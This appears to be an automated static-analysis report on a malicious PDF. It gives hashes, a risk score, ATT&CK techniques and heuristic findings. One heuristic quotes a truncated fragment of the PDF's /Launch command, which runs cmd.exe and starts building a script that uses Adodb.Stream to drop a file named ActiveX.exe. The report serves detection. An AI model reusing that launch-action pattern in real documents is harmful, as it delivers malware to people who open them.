Malicious PDF — malware analysis report

Static analysis result for SHA-256 a15e7ca6fc4b40c4…

MALICIOUS

PDF

106.9 KB
MD5: 235d58ef48049a76f6e97aa45aeca907 SHA-1: 733b0ed198193a51e5098a9d37ced17436d695b6 SHA-256: a15e7ca6fc4b40c414e30f527af4d45fe98503c5b377309f411e35c042b2a0fc
194 Risk Score

Malware Insights

MITRE ATT&CK
T1204.002 Malicious File T1059.003 Windows Command Shell

The PDF contains a critical heuristic firing for a launch action targeting cmd.exe, indicating an attempt to execute commands. The embedded script payload further supports this, and the reconstructed command line shows it attempts to use Adodb.Stream, Wscript.Shell, and scripting.filesystemobject. This suggests the PDF is designed to download and execute a second-stage payload.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9904

Heuristics 4

  • Launch action critical PDF_LAUNCH
    PDF contains a /Launch action whose target is an executable, URL, or UNC path — can start an external application
  • /Launch action target: cmd.exe critical PDF_LAUNCH_COMMAND
    PDF /Launch action specifies an executable target with parameters '/c echo m=".":n="paper.pdf" :y="c:\\windows\\system32\\ActiveX.exe":Set t=CreateObject("Adodb"+m+"Stream"' — references a known-dangerous executable (cmd, PowerShell, etc.).
  • Embedded script payload in PDF stream high PDF_EMBEDDED_SCRIPT_PAYLOAD
    PDF stream bytes contain script execution markers such as ActiveXObject/CreateObject, WScript.Shell, PowerShell, or shell-exec primitives. This is stronger than ordinary PDF JavaScript because it indicates a staged external script payload hidden in stream bytes.
  • Object number defined twice with different bodies info PDF_DUPLICATE_OBJ_BODY_INCREMENTAL
    The same indirect object (N G) is defined more than once with different body bytes. First-wins and last-wins readers will resolve different content, which is a parser-confusion shape used by targeted PDFs. Body-only differences are common in benign incremental updates, so severity is raised only when the duplicate carries active content.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
embedded_pdf_script_000002da.bin
8be50be357734796ce9d8d39c3437b21d0885c48f9df8d574608f3cb759ec778		 pdf-embedded-script PDF decompressed stream script payload at offset 0x2DA 130 bytes

Open this report in the interactive analyzer, or submit your own file for analysis.